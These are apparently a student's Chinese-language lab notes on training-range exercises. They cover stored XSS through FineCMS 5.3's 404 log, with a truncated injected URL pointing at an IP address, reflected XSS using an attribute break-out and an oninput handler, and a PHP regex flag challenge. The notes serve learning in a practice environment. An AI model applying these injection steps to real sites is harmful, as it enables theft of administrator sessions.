存储型XSS靶场作业
先信息收集 发现靶场是finecms5.3 就是404错误会存入日志 你把XSS输入404当管理员访问日志的时候就会触发所以首先得让网站404报错将从xss平台 获取的js代码链接 插入urlhttp://59.63.200.79:8082/index.php?c=text&id=1http://59.63.200.79:8082/index.php?c=text&id=<s
反射型XSS靶场作业
先通常见框X 发现语句并没有被正常执行shift+f5查看发现有两个双引号把语句当成字符串了然后用' //注释点双引号 又发现<被转义成&lt了 现在就只能用不带<的语句了 利用oninput成功拿到flag 这靶场有时候不弹 ctrl+F5多刷新几次
正式课靶场正则表达式
<?php $key='flag{********************************}'; $Regular= preg_match("/zkaq.*key.{2,9}:\/.*\/(key*key)/i", trim($_GET["id"]), $match)
1